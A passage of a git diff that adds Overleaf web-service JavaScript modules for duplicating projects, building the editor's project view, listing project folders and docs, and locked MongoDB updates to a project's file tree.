ProjectEntityUpdateHandler = require('./ProjectEntityUpdateHandler') +const ProjectGetter = require('./ProjectGetter') +const ProjectLocator = require('./ProjectLocator') +const ProjectOptionsHandler = require('./ProjectOptionsHandler') +const SafePath = require('./SafePath') +const TpdsProjectFlusher = require('../ThirdPartyDataStore/TpdsProjectFlusher') +const _ = require('lodash') +const TagsHandler = require('../Tags/TagsHandler') +const Features = 
require('../../infrastructure/Features') +const ClsiCacheManager = require('../Compile/ClsiCacheManager') + +module.exports = { + duplicate: callbackify(duplicate), + promises: { + duplicate, + }, +} + +async function duplicate(owner, originalProjectId, newProjectName, tags = []) { + await DocumentUpdaterHandler.promises.flushProjectToMongo(originalProjectId) + const originalProject = await ProjectGetter.promises.getProject( + originalProjectId, + { + compiler: true, + imageName: true, + rootFolder: true, + rootDoc_id: true, + fromV1TemplateId: true, + fromV1TemplateVersionId: true, + overleaf: true, + } + ) + const { path: rootDocPath } = await ProjectLocator.promises.findRootDoc({ + project_id: originalProjectId, + }) + + const originalEntries = _getFolderEntries(originalProject.rootFolder[0]) + + // Pass template ID as analytics segmentation if duplicating project from a template + const segmentation = _.pick(originalProject, [ + 'fromV1TemplateId', + 'fromV1TemplateVersionId', + ]) + segmentation.duplicatedFromProject = originalProjectId + + // count the number of tags before and after, for analytics + segmentation['original-tags'] = + await TagsHandler.promises.countTagsForProject( + owner._id, + originalProject._id + ) + segmentation['updated-tags'] = tags.length + + // remove any leading or trailing spaces + newProjectName = newProjectName.trim() + + // Now create the new project, cleaning it up on failure if necessary + const newProject = await ProjectCreationHandler.promises.createBlankProject( + owner._id, + newProjectName, + { segmentation } + ) + + let prepareClsiCacheInBackground = Promise.resolve() + if (originalProject.imageName === newProject.imageName) { + // Populate the clsi-cache unless the TeXLive release has changed. + prepareClsiCacheInBackground = ClsiCacheManager.prepareClsiCache( + newProject._id, + owner._id, + { sourceProjectId: originalProjectId } + ).catch(err => { + logger.warn( + { err, originalProjectId, projectId: newProject._id }, + 'failed to prepare clsi-cache for cloned project' + ) + }) + } + + try { + await ProjectOptionsHandler.promises.setCompiler( + newProject._id, + originalProject.compiler + ) + const [docEntries, fileEntries] = await Promise.all([ + _copyDocs(originalEntries.docEntries, originalProject, newProject), + _copyFiles(originalEntries.fileEntries, originalProject, newProject), + ]) + const projectVersion = + await ProjectEntityMongoUpdateHandler.promises.createNewFolderStructure( + newProject._id, + docEntries, + fileEntries + ) + // Silently ignore the rootDoc in case it's not valid per the new limits. + if ( + rootDocPath && + ProjectEntityUpdateHandler.isPathValidForRootDoc(rootDocPath.fileSystem) + ) { + await _setRootDoc(newProject._id, rootDocPath.fileSystem) + } + await _notifyDocumentUpdater(newProject, owner._id, { + newFiles: fileEntries, + newDocs: docEntries, + newProject: { version: projectVersion }, + }) + await TpdsProjectFlusher.promises.flushProjectToTpds(newProject._id) + + if (tags?.length > 0) { + await TagsHandler.promises.addProjectToTags( + owner._id, + tags.map(tag => tag.id), + newProject._id + ) + } + } catch (err) { + // Clean up broken clone on error. + // Make sure we delete the new failed project, not the original one! 
+ await ProjectDeleter.promises.deleteProject(newProject._id) + throw OError.tag(err, 'error cloning project, broken clone deleted', { + originalProjectId, + newProjectName, + newProjectId: newProject._id, + }) + } + + try { + await prepareClsiCacheInBackground + } catch {} + + return newProject +} + +function _getFolderEntries(folder, folderPath = '/') { + const docEntries = [] + const fileEntries = [] + const docs = folder.docs || [] + const files = folder.fileRefs || [] + const subfolders = folder.folders || [] + + for (const doc of docs) { + if (doc == null || doc._id == null) { + continue + } + const path = Path.join(folderPath, doc.name) + docEntries.push({ doc, path }) + } + + for (const file of files) { + if (file == null || file._id == null) { + continue + } + const path = Path.join(folderPath, file.name) + fileEntries.push({ file, path }) + } + + for (const subfolder of subfolders) { + if (subfolder == null || subfolder._id == null) { + continue + } + const subfolderPath = Path.join(folderPath, subfolder.name) + const subfolderEntries = _getFolderEntries(subfolder, subfolderPath) + for (const docEntry of subfolderEntries.docEntries) { + docEntries.push(docEntry) + } + for (const fileEntry of subfolderEntries.fileEntries) { + fileEntries.push(fileEntry) + } + } + return { docEntries, fileEntries } +} + +async function _copyDocs(sourceEntries, sourceProject, targetProject) { + const docLinesById = await _getDocLinesForProject(sourceProject._id) + const targetEntries = [] + for (const sourceEntry of sourceEntries) { + const sourceDoc = sourceEntry.doc + const path = sourceEntry.path + const doc = new Doc({ name: sourceDoc.name }) + const docLines = docLinesById.get(sourceDoc._id.toString()) + await DocstoreManager.promises.updateDoc( + targetProject._id.toString(), + doc._id.toString(), + docLines, + 0, + {} + ) + targetEntries.push({ doc, path, docLines: docLines.join('\n') }) + } + return targetEntries +} + +async function _getDocLinesForProject(projectId) { + const docs = await DocstoreManager.promises.getAllDocs(projectId) + const docLinesById = new Map(docs.map(doc => [doc._id, doc.lines])) + return docLinesById +} + +async function _copyFiles(sourceEntries, sourceProject, targetProject) { + const sourceHistoryId = sourceProject.overleaf?.history?.id + const targetHistoryId = targetProject.overleaf?.history?.id + if (!sourceHistoryId) { + throw new OError('missing history id', { sourceProject }) + } + if (!targetHistoryId) { + throw new OError('missing history id', { targetProject }) + } + + const targetEntries = await promiseMapWithLimit( + 5, + sourceEntries, + async sourceEntry => { + const sourceFile = sourceEntry.file + const path = sourceEntry.path + const file = new File({ name: SafePath.clean(sourceFile.name) }) + if (sourceFile.linkedFileData != null) { + file.linkedFileData = sourceFile.linkedFileData + file.created = sourceFile.created + } + if (sourceFile.hash != null) { + file.hash = sourceFile.hash + } + let createdBlob = false + const usingFilestore = Features.hasFeature('filestore') + if (file.hash != null && Features.hasFeature('project-history-blobs')) { + try { + await HistoryManager.promises.copyBlob( + sourceHistoryId, + targetHistoryId, + file.hash + ) + createdBlob = true + if (!usingFilestore) { + return { createdBlob, file, path, url: null } + } + } catch (err) { + if (!usingFilestore) { + throw OError.tag(err, 'unexpected error copying blob', { + sourceProjectId: sourceProject._id, + targetProjectId: targetProject._id, + sourceFile, + sourceHistoryId, 
+ }) + } else { + logger.error( + { + err, + sourceProjectId: sourceProject._id, + targetProjectId: targetProject._id, + sourceFile, + sourceHistoryId, + }, + 'unexpected error copying blob' + ) + } + } + } + if (createdBlob && Features.hasFeature('project-history-blobs')) { + return { createdBlob, file, path, url: null } + } + if (!usingFilestore) { + // Note: This is also checked in app.mjs + throw new OError( + 'bad config: need to enable either filestore or project-history-blobs' + ) + } + const url = await FileStoreHandler.promises.copyFile( + sourceProject._id, + sourceFile._id, + targetProject._id, + file._id + ) + + return { createdBlob, file, path, url } + } + ) + return targetEntries +} + +async function _setRootDoc(projectId, path) { + const { element: rootDoc } = await ProjectLocator.promises.findElementByPath({ + project_id: projectId, + path, + exactCaseMatch: true, + }) + await ProjectEntityUpdateHandler.promises.setRootDoc(projectId, rootDoc._id) +} + +async function _notifyDocumentUpdater(project, userId, changes) { + const projectHistoryId = + project.overleaf && project.overleaf.history && project.overleaf.history.id + await DocumentUpdaterHandler.promises.updateProjectStructure( + project._id, + projectHistoryId, + userId, + changes, + null + ) +} diff --git a/services/web/app/src/Features/Project/ProjectEditorHandler.js b/services/web/app/src/Features/Project/ProjectEditorHandler.js new file mode 100644 index 0000000..a85e8b5 --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectEditorHandler.js @@ -0,0 +1,156 @@ +let ProjectEditorHandler +const _ = require('lodash') +const Path = require('path') +const Features = require('../../infrastructure/Features') + +function mergeDeletedDocs(a, b) { + const docIdsInA = new Set(a.map(doc => doc._id.toString())) + return a.concat(b.filter(doc => !docIdsInA.has(doc._id.toString()))) +} + +module.exports = ProjectEditorHandler = { + trackChangesAvailable: false, + + buildProjectModelView(project, members, invites, deletedDocsFromDocstore) { + let owner, ownerFeatures + if (!Array.isArray(project.deletedDocs)) { + project.deletedDocs = [] + } + project.deletedDocs.forEach(doc => { + // The frontend does not use this field. + delete doc.deletedAt + }) + const result = { + _id: project._id, + name: project.name, + rootDoc_id: project.rootDoc_id, + mainBibliographyDoc_id: project.mainBibliographyDoc_id, + rootFolder: [this.buildFolderModelView(project.rootFolder[0])], + publicAccesLevel: project.publicAccesLevel, + dropboxEnabled: !!project.existsInDropbox, + compiler: project.compiler, + description: project.description, + spellCheckLanguage: project.spellCheckLanguage, + deletedByExternalDataSource: project.deletedByExternalDataSource || false, + deletedDocs: mergeDeletedDocs( + project.deletedDocs, + deletedDocsFromDocstore + ), + members: [], + invites: this.buildInvitesView(invites), + imageName: + project.imageName != null + ? 
Path.basename(project.imageName) + : undefined, + } + + ;({ owner, ownerFeatures, members } = + this.buildOwnerAndMembersViews(members)) + result.owner = owner + result.members = members + + result.features = _.defaults(ownerFeatures || {}, { + collaborators: -1, // Infinite + versioning: false, + dropbox: false, + compileTimeout: 60, + compileGroup: 'standard', + templates: false, + references: false, + referencesSearch: false, + mendeley: false, + trackChanges: false, + trackChangesVisible: ProjectEditorHandler.trackChangesAvailable, + symbolPalette: false, + }) + + if (result.features.trackChanges) { + result.trackChangesState = project.track_changes || false + } + + // Originally these two feature flags were both signalled by the now-deprecated `references` flag. + // For older users, the presence of the `references` feature flag should still turn on these features. + result.features.referencesSearch = + result.features.referencesSearch || result.features.references + result.features.mendeley = + result.features.mendeley || result.features.references + + return result + }, + + buildOwnerAndMembersViews(members) { + let owner = null + let ownerFeatures = null + const filteredMembers = [] + for (const member of members || []) { + if (member.privilegeLevel === 'owner') { + ownerFeatures = member.user.features + owner = this.buildUserModelView(member) + } else { + filteredMembers.push(this.buildUserModelView(member)) + } + } + return { + owner, + ownerFeatures, + members: filteredMembers, + } + }, + + buildUserModelView(member) { + const user = member.user + return { + _id: user._id, + first_name: user.first_name, + last_name: user.last_name, + email: user.email, + privileges: member.privilegeLevel, + signUpDate: user.signUpDate, + pendingEditor: member.pendingEditor, + pendingReviewer: member.pendingReviewer, + } + }, + + buildFolderModelView(folder) { + const fileRefs = _.filter(folder.fileRefs || [], file => file != null) + return { + _id: folder._id, + name: folder.name, + folders: (folder.folders || []).map(childFolder => + this.buildFolderModelView(childFolder) + ), + fileRefs: fileRefs.map(file => this.buildFileModelView(file)), + docs: (folder.docs || []).map(doc => this.buildDocModelView(doc)), + } + }, + + buildFileModelView(file) { + const additionalFileProperties = {} + + if (Features.hasFeature('project-history-blobs')) { + additionalFileProperties.hash = file.hash + } + + return { + _id: file._id, + name: file.name, + linkedFileData: file.linkedFileData, + created: file.created, + ...additionalFileProperties, + } + }, + + buildDocModelView(doc) { + return { + _id: doc._id, + name: doc.name, + } + }, + + buildInvitesView(invites) { + if (invites == null) { + return [] + } + return invites.map(invite => _.pick(invite, ['_id', 'email', 'privileges'])) + }, +} diff --git a/services/web/app/src/Features/Project/ProjectEntityHandler.js b/services/web/app/src/Features/Project/ProjectEntityHandler.js new file mode 100644 index 0000000..7d0498f --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectEntityHandler.js @@ -0,0 +1,220 @@ +const path = require('path') +const DocstoreManager = require('../Docstore/DocstoreManager') +const Errors = require('../Errors/Errors') +const ProjectGetter = require('./ProjectGetter') +const { callbackifyAll } = require('@overleaf/promise-utils') +const OError = require('@overleaf/o-error') +const { iterablePaths } = require('./IterablePath') + +async function getAllDocs(projectId) { + // We get the path and name info from the project, and 
the lines and + // version info from the doc store. + const docContentsArray = await DocstoreManager.promises.getAllDocs(projectId) + + // Turn array from docstore into a dictionary based on doc id + const docContents = {} + for (const docContent of docContentsArray) { + docContents[docContent._id] = docContent + } + + const folders = await _getAllFolders(projectId) + const docs = {} + for (const { path: folderPath, folder } of folders) { + for (const doc of iterablePaths(folder, 'docs')) { + const content = docContents[doc._id.toString()] + if (content != null) { + docs[path.join(folderPath, doc.name)] = { + _id: doc._id, + name: doc.name, + lines: content.lines, + rev: content.rev, + folder, + } + } + } + } + + return docs +} + +async function getAllFiles(projectId) { + const folders = await _getAllFolders(projectId) + const files = {} + for (const { path: folderPath, folder } of folders) { + for (const file of iterablePaths(folder, 'fileRefs')) { + if (file != null) { + files[path.join(folderPath, file.name)] = { ...file, folder } + } + } + } + return files +} + +async function getAllEntities(projectId) { + const project = await ProjectGetter.promises.getProject(projectId) + if (project == null) { + throw new Errors.NotFoundError('project not found') + } + const entities = getAllEntitiesFromProject(project) + return entities +} + +function getAllEntitiesFromProject(project) { + const folders = _getAllFoldersFromProject(project) + const docs = [] + const files = [] + for (const { path: folderPath, folder } of folders) { + for (const doc of iterablePaths(folder, 'docs')) { + if (doc != null) { + docs.push({ path: path.join(folderPath, doc.name), doc }) + } + } + for (const file of iterablePaths(folder, 'fileRefs')) { + if (file != null) { + files.push({ path: path.join(folderPath, file.name), file }) + } + } + } + return { docs, files, folders } +} + +async function getAllDocPathsFromProjectById(projectId) { + const project = + await ProjectGetter.promises.getProjectWithoutDocLines(projectId) + if (project == null) { + throw new Errors.NotFoundError('no project') + } + const docPaths = getAllDocPathsFromProject(project) + return docPaths +} + +function getAllDocPathsFromProject(project) { + const folders = _getAllFoldersFromProject(project) + const docPath = {} + for (const { path: folderPath, folder } of folders) { + for (const doc of iterablePaths(folder, 'docs')) { + docPath[doc._id] = path.join(folderPath, doc.name) + } + } + return docPath +} + +/** + * + * @param {string} projectId + * @param {string} docId + * @param {{peek?: boolean, include_deleted?: boolean}} options + * @return {Promise<{lines: *, rev: *, version: *, ranges: *}>} + */ +async function getDoc(projectId, docId, options = {}) { + const { lines, rev, version, ranges } = await DocstoreManager.promises.getDoc( + projectId, + docId, + options + ) + return { lines, rev, version, ranges } +} + +/** + * @param {ObjectId | string} projectId + * @param {ObjectId | string} docId + */ +async function getDocPathByProjectIdAndDocId(projectId, docId) { + const project = + await ProjectGetter.promises.getProjectWithoutDocLines(projectId) + if (project == null) { + throw new Errors.NotFoundError('no project') + } + const docPath = await getDocPathFromProjectByDocId(project, docId) + if (docPath == null) { + throw new Errors.NotFoundError('no doc') + } + return docPath +} + +function _recursivelyFindDocInFolder(basePath, docId, folder) { + const docInCurrentFolder = (folder.docs || []).find( + currentDoc => 
currentDoc._id.toString() === docId.toString() + ) + if (docInCurrentFolder != null) { + return path.join(basePath, docInCurrentFolder.name) + } else { + let docPath, childFolder + for (childFolder of iterablePaths(folder, 'folders')) { + docPath = _recursivelyFindDocInFolder( + path.join(basePath, childFolder.name), + docId, + childFolder + ) + if (docPath != null) { + return docPath + } + } + return null + } +} + +/** + * @param {Project} project + * @param {ObjectId | string} docId + * @param {Function} callback + */ +async function getDocPathFromProjectByDocId(project, docId) { + const docPath = _recursivelyFindDocInFolder('/', docId, project.rootFolder[0]) + return docPath +} + +async function _getAllFolders(projectId) { + const project = + await ProjectGetter.promises.getProjectWithoutDocLines(projectId) + + if (project == null) { + throw new Errors.NotFoundError('no project') + } + const folders = _getAllFoldersFromProject(project) + return folders +} + +function _getAllFoldersFromProject(project) { + const folders = [] + try { + const processFolder = (basePath, folder) => { + folders.push({ path: basePath, folder }) + if (folder.folders) { + for (const childFolder of iterablePaths(folder, 'folders')) { + if (childFolder.name != null) { + const childPath = path.join(basePath, childFolder.name) + processFolder(childPath, childFolder) + } + } + } + } + processFolder('/', project.rootFolder[0]) + return folders + } catch (err) { + throw OError.tag(err, 'Error getting folders', { projectId: project._id }) + } +} + +const ProjectEntityHandler = { + getAllDocs, + getAllFiles, + getAllEntities, + getAllDocPathsFromProjectById, + getDoc, + getDocPathByProjectIdAndDocId, + getDocPathFromProjectByDocId, + _getAllFolders, +} + +module.exports = { + ...callbackifyAll(ProjectEntityHandler, { + multiResult: { + getDoc: ['lines', 'rev', 'version', 'ranges'], + }, + }), + promises: ProjectEntityHandler, + getAllEntitiesFromProject, + getAllDocPathsFromProject, + _getAllFoldersFromProject, +} diff --git a/services/web/app/src/Features/Project/ProjectEntityMongoUpdateHandler.js b/services/web/app/src/Features/Project/ProjectEntityMongoUpdateHandler.js new file mode 100644 index 0000000..84002f1 --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectEntityMongoUpdateHandler.js @@ -0,0 +1,764 @@ +const { callbackify } = require('util') +const { callbackifyMultiResult } = require('@overleaf/promise-utils') +const logger = require('@overleaf/logger') +const path = require('path') +const { ObjectId } = require('mongodb-legacy') +const Settings = require('@overleaf/settings') +const OError = require('@overleaf/o-error') +const CooldownManager = require('../Cooldown/CooldownManager') +const Errors = require('../Errors/Errors') +const { Folder } = require('../../models/Folder') +const LockManager = require('../../infrastructure/LockManager') +const { Project } = require('../../models/Project') +const ProjectEntityHandler = require('./ProjectEntityHandler') +const ProjectGetter = require('./ProjectGetter') +const ProjectLocator = require('./ProjectLocator') +const FolderStructureBuilder = require('./FolderStructureBuilder') +const SafePath = require('./SafePath') +const { DeletedFile } = require('../../models/DeletedFile') +const { iterablePaths } = require('./IterablePath') + +const LOCK_NAMESPACE = 'mongoTransaction' +const ENTITY_TYPE_TO_MONGO_PATH_SEGMENT = { + doc: 'docs', + docs: 'docs', + file: 'fileRefs', + files: 'fileRefs', + fileRefs: 'fileRefs', + folder: 'folders', + folders: 'folders', 
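+  // Both the singular entity types used by callers ('doc', 'file', 'folder')
+  // and the plural mongo array names map to the same filetree field name,
+  // so either form can be passed to _getMongoPathSegmentFromType below.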
+} + +module.exports = { + LOCK_NAMESPACE, + addDoc: callbackifyMultiResult(wrapWithLock(addDoc), ['result', 'project']), + addFile: callbackifyMultiResult(wrapWithLock(addFile), ['result', 'project']), + addFolder: callbackifyMultiResult(wrapWithLock(addFolder), [ + 'folder', + 'parentFolderId', + ]), + replaceFileWithNew: callbackifyMultiResult(wrapWithLock(replaceFileWithNew), [ + 'oldFileRef', + 'project', + 'path', + 'newProject', + 'newFileRef', + ]), + replaceDocWithFile: callbackify(replaceDocWithFile), + replaceFileWithDoc: callbackify(replaceFileWithDoc), + mkdirp: callbackifyMultiResult(wrapWithLock(mkdirp), [ + 'newFolders', + 'folder', + 'parentFolder', + ]), + moveEntity: callbackifyMultiResult(wrapWithLock(moveEntity), [ + 'project', + 'startPath', + 'endPath', + 'rev', + 'changes', + ]), + deleteEntity: callbackifyMultiResult(wrapWithLock(deleteEntity), [ + 'entity', + 'path', + 'projectBeforeDeletion', + 'newProject', + ]), + renameEntity: callbackifyMultiResult(wrapWithLock(renameEntity), [ + 'project', + 'startPath', + 'endPath', + 'rev', + 'changes', + ]), + createNewFolderStructure: callbackify(wrapWithLock(createNewFolderStructure)), + _insertDeletedFileReference: callbackify(_insertDeletedFileReference), + _putElement: callbackifyMultiResult(_putElement, ['result', 'project']), + _confirmFolder, + promises: { + addDoc: wrapWithLock(addDoc), + addFile: wrapWithLock(addFile), + addFolder: wrapWithLock(addFolder), + replaceFileWithNew: wrapWithLock(replaceFileWithNew), + replaceDocWithFile: wrapWithLock(replaceDocWithFile), + replaceFileWithDoc: wrapWithLock(replaceFileWithDoc), + mkdirp: wrapWithLock(mkdirp), + moveEntity: wrapWithLock(moveEntity), + deleteEntity: wrapWithLock(deleteEntity), + renameEntity: wrapWithLock(renameEntity), + createNewFolderStructure: wrapWithLock(createNewFolderStructure), + _insertDeletedFileReference, + _putElement, + }, +} + +function wrapWithLock(methodWithoutLock) { + // This lock is used whenever we read or write to an existing project's + // structure. Some operations to project structure cannot be done atomically + // in mongo, this lock is used to prevent reading the structure between two + // parts of a staged update. 
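+  //
+  // A behavioural sketch (illustration only): two concurrent calls for the
+  // same project are serialised rather than interleaved, e.g.
+  //
+  //   await Promise.all([
+  //     promises.addDoc(projectId, folderId, docA, userId),
+  //     promises.addDoc(projectId, folderId, docB, userId),
+  //   ])
+  //
+  // runs the two structure updates one after the other under the
+  // 'mongoTransaction' lock for that projectId.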
+ async function methodWithLock(projectId, ...rest) { + return LockManager.promises.runWithLock(LOCK_NAMESPACE, projectId, () => + methodWithoutLock(projectId, ...rest) + ) + } + return methodWithLock +} + +async function addDoc(projectId, folderId, doc, userId) { + const project = await ProjectGetter.promises.getProjectWithoutLock( + projectId, + { + rootFolder: true, + name: true, + overleaf: true, + } + ) + folderId = _confirmFolder(project, folderId) + const { result, project: newProject } = await _putElement( + project, + folderId, + doc, + 'doc', + userId + ) + return { result, project: newProject } +} + +async function addFile(projectId, folderId, fileRef, userId) { + const project = await ProjectGetter.promises.getProjectWithoutLock( + projectId, + { rootFolder: true, name: true, overleaf: true } + ) + folderId = _confirmFolder(project, folderId) + const { result, project: newProject } = await _putElement( + project, + folderId, + fileRef, + 'file', + userId + ) + return { result, project: newProject } +} + +async function addFolder(projectId, parentFolderId, folderName, userId) { + const project = await ProjectGetter.promises.getProjectWithoutLock( + projectId, + { rootFolder: true, name: true, overleaf: true } + ) + parentFolderId = _confirmFolder(project, parentFolderId) + const folder = new Folder({ name: folderName }) + await _putElement(project, parentFolderId, folder, 'folder', userId) + return { folder, parentFolderId } +} + +async function replaceFileWithNew(projectId, fileId, newFileRef, userId) { + const project = await ProjectGetter.promises.getProjectWithoutLock( + projectId, + { rootFolder: true, name: true, overleaf: true } + ) + const { element: fileRef, path } = await ProjectLocator.promises.findElement({ + project, + element_id: fileId, + type: 'file', + }) + await _insertDeletedFileReference(projectId, fileRef) + const newProject = await Project.findOneAndUpdate( + { _id: project._id, [path.mongo]: { $exists: true } }, + { + $set: { + [`${path.mongo}._id`]: newFileRef._id, + [`${path.mongo}.created`]: new Date(), + [`${path.mongo}.linkedFileData`]: newFileRef.linkedFileData, + [`${path.mongo}.hash`]: newFileRef.hash, + lastUpdated: new Date(), + lastUpdatedBy: userId, + }, + $inc: { + version: 1, + [`${path.mongo}.rev`]: 1, + }, + }, + // Note: Mongoose uses new:true to return the modified document + // https://mongoosejs.com/docs/api.html#model_Model.findOneAndUpdate + // but Mongo uses returnNewDocument:true instead + // https://docs.mongodb.com/manual/reference/method/db.collection.findOneAndUpdate/ + // We are using Mongoose here, but if we ever switch to a direct mongo call + // the next line will need to be updated. 
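+    // (Newer versions of the mongo node driver spell the same option
+    // { returnDocument: 'after' } rather than returnNewDocument.)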
+ { new: true } + ).exec() + if (newProject == null) { + throw new OError('Project not found or path not found in filetree', { + projectId, + path, + }) + } + // Refresh newFileRef with the version returned from the database + newFileRef = ProjectLocator.findElementByMongoPath(newProject, path.mongo) + return { oldFileRef: fileRef, project, path, newProject, newFileRef } +} + +async function replaceDocWithFile(projectId, docId, fileRef, userId) { + const project = await ProjectGetter.promises.getProjectWithoutLock( + projectId, + { rootFolder: true, name: true, overleaf: true } + ) + const { path } = await ProjectLocator.promises.findElement({ + project, + element_id: docId, + type: 'doc', + }) + const folderMongoPath = _getParentMongoPath(path.mongo) + const newProject = await Project.findOneAndUpdate( + { _id: project._id, [folderMongoPath]: { $exists: true } }, + { + $pull: { + [`${folderMongoPath}.docs`]: { _id: docId }, + }, + $push: { + [`${folderMongoPath}.fileRefs`]: fileRef, + }, + $inc: { version: 1 }, + $set: { lastUpdated: new Date(), lastUpdatedBy: userId }, + }, + { new: true } + ).exec() + if (newProject == null) { + throw new OError('Project not found or path not found in filetree', { + projectId, + path, + }) + } + return newProject +} + +async function replaceFileWithDoc(projectId, fileId, newDoc, userId) { + const project = await ProjectGetter.promises.getProjectWithoutLock( + projectId, + { rootFolder: true, name: true, overleaf: true } + ) + const { path } = await ProjectLocator.promises.findElement({ + project, + element_id: fileId, + type: 'file', + }) + const folderMongoPath = _getParentMongoPath(path.mongo) + const newProject = await Project.findOneAndUpdate( + { _id: project._id, [folderMongoPath]: { $exists: true } }, + { + $pull: { + [`${folderMongoPath}.fileRefs`]: { _id: fileId }, + }, + $push: { + [`${folderMongoPath}.docs`]: newDoc, + }, + $inc: { version: 1 }, + $set: { lastUpdated: new Date(), lastUpdatedBy: userId }, + }, + { new: true } + ).exec() + if (newProject == null) { + throw new OError('Project not found or path not found in filetree', { + projectId, + path, + }) + } + return newProject +} + +async function mkdirp(projectId, path, userId, options = {}) { + // defaults to case insensitive paths, use options {exactCaseMatch:true} + // to make matching case-sensitive + const folders = path.split('/').filter(folder => folder.length !== 0) + + const project = + await ProjectGetter.promises.getProjectWithOnlyFolders(projectId) + if (path === '/') { + return { newFolders: [], folder: project.rootFolder[0] } + } + + const newFolders = [] + let builtUpPath = '' + let lastFolder = null + for (const folderName of folders) { + builtUpPath += `/${folderName}` + try { + const { element: foundFolder, folder: parentFolder } = + await ProjectLocator.promises.findElementByPath({ + project, + path: builtUpPath, + exactCaseMatch: options.exactCaseMatch, + }) + lastFolder = foundFolder + lastFolder.parentFolder_id = parentFolder._id + } catch (err) { + // Folder couldn't be found. Create it. 
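+      // e.g. mkdirp(projectId, '/a/b/c', userId) walks '/a', '/a/b' and
+      // '/a/b/c' in turn, reusing any folders that already exist, so
+      // newFolders ends up holding only the folders created on this call.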
+ const parentFolderId = lastFolder && lastFolder._id + const { folder: newFolder, parentFolderId: newParentFolderId } = + await addFolder(projectId, parentFolderId, folderName, userId) + newFolder.parentFolder_id = newParentFolderId + lastFolder = newFolder + newFolders.push(newFolder) + } + } + return { folder: lastFolder, newFolders } +} + +async function moveEntity( + projectId, + entityId, + destFolderId, + entityType, + userId +) { + const project = await ProjectGetter.promises.getProjectWithoutLock( + projectId, + { rootFolder: true, name: true, overleaf: true } + ) + const { element: entity, path: entityPath } = + await ProjectLocator.promises.findElement({ + project, + element_id: entityId, + type: entityType, + }) + // Prevent top-level docs/files with reserved names (to match v1 behaviour) + if (_blockedFilename(entityPath, entityType)) { + throw new Errors.InvalidNameError('blocked element name') + } + await _checkValidMove(project, entityType, entity, entityPath, destFolderId) + const { docs: oldDocs, files: oldFiles } = + ProjectEntityHandler.getAllEntitiesFromProject(project) + // For safety, insert the entity in the destination + // location first, and then remove the original. If + // there is an error the entity may appear twice. This + // will cause some breakage but is better than being + // lost, which is what happens if this is done in the + // opposite order. + const { result } = await _putElement( + project, + destFolderId, + entity, + entityType, + userId + ) + // Note: putElement always pushes onto the end of an + // array so it will never change an existing mongo + // path. Therefore it is safe to remove an element + // from the project with an existing path after + // calling putElement. But we must be sure that we + // have not moved a folder subfolder of itself (which + // is done by _checkValidMove above) because that + // would lead to it being deleted. 
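+  // e.g. moving /a into its own subfolder /a/b would first insert the copy
+  // at /a/b/a and then delete the original /a, taking the copy with it,
+  // which is why _checkValidMove rejects such moves before we get here.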
+ const newProject = await _removeElementFromMongoArray( + projectId, + entityPath.mongo, + entityId, + userId + ) + const { docs: newDocs, files: newFiles } = + ProjectEntityHandler.getAllEntitiesFromProject(newProject) + const startPath = entityPath.fileSystem + const endPath = result.path.fileSystem + const changes = { + oldDocs, + newDocs, + oldFiles, + newFiles, + newProject, + } + // check that no files have been lost (or duplicated) + if ( + oldFiles.length !== newFiles.length || + oldDocs.length !== newDocs.length + ) { + logger.warn( + { + projectId, + oldDocs: oldDocs.length, + newDocs: newDocs.length, + oldFiles: oldFiles.length, + newFiles: newFiles.length, + origProject: project, + newProject, + }, + "project corrupted moving files - shouldn't happen" + ) + throw new Error('unexpected change in project structure') + } + return { project, startPath, endPath, rev: entity.rev, changes } +} + +async function deleteEntity(projectId, entityId, entityType, userId) { + const project = await ProjectGetter.promises.getProjectWithoutLock( + projectId, + { name: true, rootFolder: true, overleaf: true, rootDoc_id: true } + ) + if ( + entityType === 'folder' && + project.rootFolder.some( + rootFolder => rootFolder._id.toString() === entityId.toString() + ) + ) { + throw new Errors.NonDeletableEntityError('cannot delete root folder') + } + + const deleteRootDoc = + project.rootDoc_id && + entityId && + project.rootDoc_id.toString() === entityId.toString() + const { element: entity, path } = await ProjectLocator.promises.findElement({ + project, + element_id: entityId, + type: entityType, + }) + const newProject = await _removeElementFromMongoArray( + projectId, + path.mongo, + entityId, + userId, + deleteRootDoc + ) + return { entity, path, projectBeforeDeletion: project, newProject } +} + +async function renameEntity(projectId, entityId, entityType, newName, userId) { + const project = await ProjectGetter.promises.getProjectWithoutLock( + projectId, + { rootFolder: true, name: true, overleaf: true } + ) + const { + element: entity, + path: entPath, + folder: parentFolder, + } = await ProjectLocator.promises.findElement({ + project, + element_id: entityId, + type: entityType, + }) + const startPath = entPath.fileSystem + const endPath = path.join(path.dirname(entPath.fileSystem), newName) + + // Prevent top-level docs/files with reserved names (to match v1 behaviour) + if (_blockedFilename({ fileSystem: endPath }, entityType)) { + throw new Errors.InvalidNameError('blocked element name') + } + + // check if the new name already exists in the current folder + _checkValidElementName(parentFolder, newName) + + const { docs: oldDocs, files: oldFiles } = + ProjectEntityHandler.getAllEntitiesFromProject(project) + + // we need to increment the project version number for any structure change + const newProject = await Project.findOneAndUpdate( + { _id: projectId, [entPath.mongo]: { $exists: true } }, + { + $set: { + [`${entPath.mongo}.name`]: newName, + lastUpdated: new Date(), + lastUpdatedBy: userId, + }, + $inc: { version: 1 }, + }, + { new: true } + ).exec() + if (newProject == null) { + throw new OError('Project not found or path not found in filetree', { + projectId, + path: entPath, + }) + } + + const { docs: newDocs, files: newFiles } = + ProjectEntityHandler.getAllEntitiesFromProject(newProject) + return { + project, + startPath, + endPath, + rev: entity.rev, + changes: { oldDocs, newDocs, oldFiles, newFiles, newProject }, + } +} + +async function _insertDeletedFileReference(projectId, 
